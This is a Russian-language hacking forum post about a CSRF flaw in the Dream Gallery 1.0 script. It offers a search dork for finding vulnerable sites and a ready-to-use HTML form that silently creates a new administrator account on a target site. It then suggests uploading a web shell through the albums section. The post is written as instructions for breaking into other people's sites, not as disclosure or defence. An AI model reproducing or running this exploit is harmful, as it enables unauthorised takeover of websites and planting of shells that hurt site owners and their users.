РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

Dream Gallery баг

Сообщения
191
Реакции
233
Баллы
58
В скрипте Dream Gallery 1.0 найдено уязвимость CSRF - Add Admin
Т.е можно в админке создать нового админа
Дорк: "Design by Rafael Clares"
В найденных сайта ищем админку.
site.ru/admin
Как только найдем сайта с админкой можно приступить к взлому
Открываем блокнот и пишем такой код
Код:
<html>
<bOdy>
   <form method="post" action="http://site.ru/admin/usuario.php?action=incluir">
      <input type="hidden" name="user_login" value="darkknight">
      <input type="hidden" name="user_password" type="hidden" value="parol" >
      <input type="hidden" name="user_email" value="">
      <input type="submit" value="hack">
</form>
</bOdy>
</html>
тут darkknight будет логин админа
parol - пароль админа
site.ru - тут меняем только домен у которого мы нашли админку
сохраняем как html и запускаем в браузере
После того как нажимаем кнопку hack мы попадаем в админку сайта
там будет надпись Hey Dude!
После этого можно спокойно зайти в раздел albums и загрузить туда шелл
 
  • Like
Реакции: ResH
Сверху